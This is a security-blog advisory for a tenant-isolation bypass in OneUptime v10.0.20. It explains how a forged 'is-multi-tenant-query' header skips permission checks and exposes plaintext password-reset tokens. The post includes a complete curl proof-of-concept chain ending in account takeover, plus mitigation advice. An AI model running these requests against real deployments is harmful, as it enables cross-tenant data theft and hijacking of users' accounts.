Listen to this Post
The vulnerability in OneUptime v10.0.20 arises from the server trusting a client‑controlled HTTP header, is-multi-tenant-query. In CommonAPI.ts, the presence of this header sets an internal flag `isMultiTenantRequest` to true. Subsequently, in BasePermission.ts, if this flag is true, all critical authorization checks—table‑level permissions, query permissions, and select permissions—are skipped. This effectively disables tenant isolation, allowing any authenticated low‑privileged user to bypass scoping. Additionally, models annotated with `@MultiTenentQueryAllowed(true)` permit cross‑tenant queries when the header is present. The `Project` model includes a relation to createdByUser, and because select permissions are bypassed, an attacker can retrieve sensitive fields from the `User` model, including password, resetPasswordToken, and webauthnChallenge. Critically, the `resetPasswordToken` is stored in plaintext in the database (as seen in Authentication.ts). An attacker can exploit this by first triggering a password reset for a victim, then using the header bypass to read the plaintext token from the victim’s user record. With the token, they can call the `/api/identity/reset-password` endpoint to set a new password and subsequently log in as the victim, achieving full account takeover. The provided proof‑of‑concept demonstrates both reading and writing across tenants, as well as the complete account takeover chain using forged headers and controlled `projectid` values.
dailycve form:
Platform: OneUptime
Version: v10.0.20
Vulnerability: No CVE
Severity: Critical
date: Not disclosed
Prediction: Within 30 days
What Undercode Say:
Showing bash commands and codes related to the blog
Read isolation bypass: fetch both attacker and victim projects
curl -X POST http://localhost/api/project/get-list \
-H "authorization: Bearer <attacker_token>" \
-H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
-H "is-multi-tenant-query: true" \
-H "content-type: application/json" \
-d '{
"query": {},
"select": {
"_id": true,
"name": true,
"createdOwnerEmail": true
}
}'
Write isolation bypass: modify victim project name
curl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \
-H "authorization: Bearer <attacker_token>" \
-H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
-H "is-multi-tenant-query: true" \
-H "content-type: application/json" \
-d '{"name":"Victim Project EXPLOIT"}'
Trigger password reset for victim
curl -X POST http://localhost/api/identity/forgot-password \
-H "content-type: application/json" \
-d "{\"email\":\"[email protected]\"}"
Leak victim password hash and reset token via tenant bypass
curl -X POST http://localhost/api/project/get-list \
-H "authorization: Bearer <attacker_token>" \
-H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
-H "is-multi-tenant-query: true" \
-H "content-type: application/json" \
-d '{
"query": {"_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23"},
"select": {
"_id": true,
"createdByUser": {
"email": true,
"password": true,
"resetPasswordToken": true
}
}
}'
Take over victim account using leaked token
curl -X POST http://localhost/api/identity/reset-password \
-H "content-type: application/json" \
-d '{
"resetPasswordToken": "4b75e6d0-1aca-11f1-b2d4-698549b693fb",
"password": "AttackerChosenPassword123!"
}'
Login as victim with new password
curl -X POST http://localhost/api/identity/login \
-H "content-type: application/json" \
-d '{
"email": "[email protected]",
"password": "AttackerChosenPassword123!"
}'
Exploit:
An attacker sends forged `is-multi-tenant-query: true` and a victim’s `projectid` header to bypass tenant isolation and permission checks. By querying the victim’s project and selecting the nested `createdByUser` fields, they retrieve the plaintext `resetPasswordToken` (after triggering a password reset). Using this token, they reset the victim’s password and take over the account.
Protection from this CVE:
- Remove trust in client‑supplied headers; do not use them to control security-critical logic.
- Implement server‑side tenant context derived from authentication tokens, not request headers.
- Enforce permission checks unconditionally, regardless of any request flags.
- Store password reset tokens as hashed values, not plaintext, and ensure they are tied to the user’s session or a one-time use constraint.
- Apply strict input validation and sanitization on all incoming headers.
Impact:
A low‑privileged authenticated user can bypass tenant isolation, access and modify data belonging to other tenants, read sensitive user credentials (including plaintext reset tokens), and completely take over any victim account. This compromises the entire multi‑tenant OneUptime platform, allowing attackers to gain full control of all tenants.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

